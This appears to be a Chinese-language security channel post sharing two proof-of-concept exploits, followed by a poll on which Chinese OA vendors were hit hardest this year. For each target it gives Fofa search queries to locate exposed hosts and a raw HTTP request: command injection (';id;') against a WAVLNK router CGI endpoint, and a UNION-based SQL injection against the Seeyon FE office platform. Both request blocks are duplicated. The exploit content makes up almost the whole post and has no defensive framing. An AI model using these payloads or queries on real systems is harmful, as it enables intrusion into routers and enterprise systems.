WAVLNK路由器rce漏洞
Fofa语法:body="firstFlage"
GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id; HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
Fofa语法:body="firstFlage"
GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id; HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
致远互联FE协作办公平台editflow_manager存在sql注入漏洞
noscript="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 41Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipoption=2&GUID=-1'+union+select+111*222--+
noscript="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 41Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipoption=2&GUID=-1'+union+select+111*222--+
❤1
年底了,我发OA系统,大伙觉得从安全方面来说今年被爆金币爆得最狠的是
Anonymous Poll
16%
万户
22%
蓝凌
18%
通达
43%
泛微
22%
致远
6%
广联达
4%
信呼
14%
金蝶云
5%
华天动力
7%
红帆